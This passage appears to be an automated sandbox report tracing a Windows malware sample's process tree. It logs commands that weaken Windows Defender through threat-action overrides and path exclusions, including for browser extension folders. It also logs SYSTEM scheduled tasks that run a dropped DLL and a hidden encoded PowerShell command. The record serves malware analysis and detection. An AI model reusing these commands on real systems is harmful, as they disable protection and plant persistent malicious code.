REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3852
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CMKMbRFSZeNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CMKMbRFSZeNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JXqrxIFSrhCmC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JXqrxIFSrhCmC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YjQMAHbWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YjQMAHbWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLghTkXXJYUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLghTkXXJYUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UQYVlFmkpVlhWwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UQYVlFmkpVlhWwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YIXdnjwIixpMFthL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YIXdnjwIixpMFthL\" /t REG_DWORD /d 0 /reg:64;"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4916 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:516
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:323⤵PID:3600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:643⤵PID:212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UQYVlFmkpVlhWwVB /t REG_DWORD /d 0 /reg:323⤵PID:3576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UQYVlFmkpVlhWwVB /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA /t REG_DWORD /d 0 /reg:323⤵PID:4660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA /t REG_DWORD /d 0 /reg:643⤵PID:1172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YIXdnjwIixpMFthL /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YIXdnjwIixpMFthL /t REG_DWORD /d 0 /reg:643⤵PID:5024
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZqXlPZcW" /SC once /ST 03:50:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:4092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZqXlPZcW"2⤵
- System Location Discovery: System Language Discovery
PID:4176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZqXlPZcW"2⤵PID:4868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XzTTGfRHhsSQnOLDY"2⤵PID:3804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XzTTGfRHhsSQnOLDY"2⤵PID:4664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XzTTGfRHhsSQnOLDY2"2⤵PID:3460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XzTTGfRHhsSQnOLDY2"2⤵PID:1168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FWbuSwfZFsgwoXKWz"2⤵PID:2016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FWbuSwfZFsgwoXKWz"2⤵
- System Location Discovery: System Language Discovery
PID:880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FWbuSwfZFsgwoXKWz2"2⤵
- System Location Discovery: System Language Discovery
PID:1004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FWbuSwfZFsgwoXKWz2"2⤵
- System Location Discovery: System Language Discovery
PID:5032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QARjdqhHkeUSJySsU"2⤵PID:2808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QARjdqhHkeUSJySsU"2⤵
- System Location Discovery: System Language Discovery
PID:4508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QARjdqhHkeUSJySsU2"2⤵
- System Location Discovery: System Language Discovery
PID:5092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QARjdqhHkeUSJySsU2"2⤵
- System Location Discovery: System Language Discovery
PID:1236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fQYKPzMybePlvBGQCyc"2⤵
- System Location Discovery: System Language Discovery
PID:4840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fQYKPzMybePlvBGQCyc"2⤵
- System Location Discovery: System Language Discovery
PID:4012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fQYKPzMybePlvBGQCyc2"2⤵
- System Location Discovery: System Language Discovery
PID:4056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fQYKPzMybePlvBGQCyc2"2⤵PID:2400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FIPQnGcqMxrFEWDuliU"2⤵PID:2316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FIPQnGcqMxrFEWDuliU"2⤵PID:4692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FIPQnGcqMxrFEWDuliU2"2⤵
- System Location Discovery: System Language Discovery
PID:4340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FIPQnGcqMxrFEWDuliU2"2⤵PID:4424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YIKgGKXxRbHNIaIyYyL"2⤵PID:4748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YIKgGKXxRbHNIaIyYyL"2⤵
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YIKgGKXxRbHNIaIyYyL2"2⤵
- System Location Discovery: System Language Discovery
PID:2208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YIKgGKXxRbHNIaIyYyL2"2⤵PID:4868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YjQMAHbWU\GJPBsU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "GqmqubHZBeiIxpo" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OQOjSEtbMvvyYjD"2⤵
- System Location Discovery: System Language Discovery
PID:640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OQOjSEtbMvvyYjD"2⤵
- System Location Discovery: System Language Discovery
PID:2156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OQOjSEtbMvvyYjD2"2⤵PID:2860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OQOjSEtbMvvyYjD2"2⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FKVxFcymEbpqvaq"2⤵PID:4428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FKVxFcymEbpqvaq"2⤵
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FKVxFcymEbpqvaq2"2⤵PID:4008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FKVxFcymEbpqvaq2"2⤵PID:4196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rOGhtOyMLHtWlf"2⤵PID:1468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rOGhtOyMLHtWlf"2⤵PID:5056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "geJJKyFMaGRjIf"2⤵
- System Location Discovery: System Language Discovery
PID:4828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geJJKyFMaGRjIf"2⤵
- System Location Discovery: System Language Discovery
PID:4944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iSixUSrJJvCYJ"2⤵
- System Location Discovery: System Language Discovery
PID:4612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iSixUSrJJvCYJ"2⤵PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iSixUSrJJvCYJ2"2⤵PID:4296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iSixUSrJJvCYJ2"2⤵PID:3492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vZzcwClkycEgo"2⤵
- System Location Discovery: System Language Discovery
PID:4020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vZzcwClkycEgo"2⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vZzcwClkycEgo2"2⤵PID:2636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vZzcwClkycEgo2"2⤵PID:4076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GqmqubHZBeiIxpo2" /F /xml "C:\Program Files (x86)\YjQMAHbWU\faAvUyh.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "GqmqubHZBeiIxpo"2⤵PID:4876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GqmqubHZBeiIxpo"2⤵PID:1340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xVzozZXYwkkdWg" /F /xml "C:\Program Files (x86)\CMKMbRFSZeNU2\ymlANau.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AGouOwHOLlnps2" /F /xml "C:\ProgramData\UQYVlFmkpVlhWwVB\BDWPyAV.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QARjdqhHkeUSJySsU2" /F /xml "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\OzBNeCy.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YIKgGKXxRbHNIaIyYyL2" /F /xml "C:\Program Files (x86)\JXqrxIFSrhCmC\DDLWHNh.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 17522⤵
- Program crash
PID:228
-
-
